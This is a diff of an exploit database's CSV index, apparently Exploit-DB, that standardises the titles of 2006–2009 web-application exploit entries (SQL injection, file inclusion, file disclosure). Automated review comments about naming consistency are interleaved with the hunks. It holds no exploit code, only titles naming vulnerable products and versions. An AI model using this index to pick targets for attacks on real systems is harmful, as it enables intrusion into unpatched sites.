1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0
1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0
1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0
1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0 1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0
1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0 1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0
@ -16246,7 +16245,7 @@ id,file,description,date,author,platform,type,port
2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0 2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0
2064,platforms/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0 2064,platforms/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0
@ -16287,7 +16286,7 @@ id,file,description,date,author,platform,type,port
2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0
2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0
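Review bot: 2120 gains "Parameter" after 'abs_path', but 2119 directly above ("PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion") has the same title form and is left unchanged, so two adjacent rows now follow different conventions. Apply the same rename to 2119 in this commit, or leave both as they were.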
@ -17918,7 +17917,7 @@ id,file,description,date,author,platform,type,port
4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0
4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0
4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0
4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Parameter Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0
4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0
4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0 4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0
4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0
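Review bot: The new title for 4606 drops "index.php", which was the only place the row named the affected script; a reader working from the CSV alone can no longer tell which file takes the 'site' parameter. Either keep the script name in the title or confirm it is stated in 4606.txt. Rows 4604 "(common.php pathdot)" and 4607 "(cmsdir)" in the same hunk still use the old parenthesised form.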
@ -18275,54 +18274,54 @@ id,file,description,date,author,platform,type,port
5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0
5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0
5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0 5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0
5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - (products.php cat) SQL Injection",2008-02-12,NTOS-Team,php,webapps,0 5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' Parameter SQL Injection",2008-02-12,NTOS-Team,php,webapps,0
5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0
5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0
5109,platforms/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - 'aid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0
5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0
5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - (threads.php ssid) SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - 'ssid' Parameter SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0
5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0
5117,platforms/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - (iid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5117,platforms/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - 'iid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0
5118,platforms/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5118,platforms/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - 'tid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0
5119,platforms/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5119,platforms/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - 'tid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0
5120,platforms/php/webapps/5120.pl,"Joomla! Component mediaslide (albumnum) - Blind SQL Injection",2008-02-14,Inphex,php,webapps,0 5120,platforms/php/webapps/5120.pl,"Joomla! Component mediaslide - 'albumnum' Blind SQL Injection",2008-02-14,Inphex,php,webapps,0
5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0
5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0 5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)",2008-02-14,Xar,php,webapps,0
5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - 'surano' Parameter SQL Injection",2008-02-15,Don,php,webapps,0
5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0
5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0
5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - (indexen.php area) SQL Injection",2008-02-16,JosS,php,webapps,0 5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - 'area' Parameter SQL Injection",2008-02-16,JosS,php,webapps,0
5132,platforms/php/webapps/5132.txt,"Joomla! Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5132,platforms/php/webapps/5132.txt,"Joomla! Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0
5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0
5134,platforms/php/webapps/5134.txt,"Joomla! Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla! Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0
5135,platforms/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5135,platforms/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,php,webapps,0
5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0
5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0
5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0
5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0
5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0
5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - (user_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,php,webapps,0 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,php,webapps,0 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - (artid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - 'artid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - (page_id) SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0 5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - 'page_id' Parameter SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0
5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - 'okulid' Parameter SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0
5160,platforms/php/webapps/5160.txt,"Joomla! Component com_hwdvideoshare - SQL Injection",2008-02-20,S@BUN,php,webapps,0 5160,platforms/php/webapps/5160.txt,"Joomla! Component Highwood Design hwdVideoShare - SQL Injection",2008-02-20,S@BUN,php,webapps,0
5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - (artid) SQL Injection",2008-02-20,DamaR,php,webapps,0 5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - 'artid' Parameter SQL Injection",2008-02-20,DamaR,php,webapps,0
5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - (file) Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0 5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - 'file' Parameter Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0
5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' SQL Injection",2008-02-20,Crackers_Child,php,webapps,0 5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection",2008-02-20,Crackers_Child,php,webapps,0
5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps,0 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps,0
5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0 5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0
5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0 5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0
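Review bot: Row 5105 still reads "'albums' Pramater SQL Injection"; since this pass rewrites nearby rows (5101, 5109) to the "'x' Parameter" form, the misspelling should be corrected to "Parameter" here too. Two renames also break the pattern the rest of the hunk follows: 5120 becomes "mediaslide - 'albumnum' Blind SQL Injection" without the word "Parameter", and 5160 replaces "com_hwdvideoshare" with "Highwood Design hwdVideoShare", removing the component identifier that the other Joomla! rows (com_galeria, com_pccookbook, com_clasifier) keep and that people are likely to search on. Rows 5138 (unquoted "refer.php") and 5139 ("'categoryId' SQL Injection") were skipped.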
@ -18582,7 +18581,7 @@ id,file,description,date,author,platform,type,port
5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0
5512,platforms/php/webapps/5512.pl,"Joomla! Component com_alphacontent - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5512,platforms/php/webapps/5512.pl,"Joomla! Component com_alphacontent - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - (gid) Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0
5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0
5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0
5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0
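Review bot: Only 5514 is converted in this hunk, yet 5517 keeps "(host_id)" on the product side of the hyphen ("Softbiz Web Host Directory Script (host_id) - SQL Injection"), which is the form most likely to confuse anything that splits the title on " - ". Suggest "Softbiz Web Host Directory Script - 'host_id' Parameter SQL Injection", and a decision on whether 5516's combined "'Directory.php cat_id'" and 5520's "(browse.videos.php category)" are meant to stay.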
@ -19747,7 +19746,7 @@ id,file,description,date,author,platform,type,port
7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0
7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0
7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0
7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - (Authentication Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0 7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
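Review bot: Row 7004 is flipped to "SQL Injection (Authentication Bypass)", but 7005 and 7008 in the same hunk keep "(Authentication Bypass) SQL Injection", so three consecutive entries for the same bug class now use two different word orders. Apply the new order to 7005 and 7008 here, or leave 7004 alone until the whole file is converted.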
@ -20371,7 +20370,7 @@ id,file,description,date,author,platform,type,port
7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
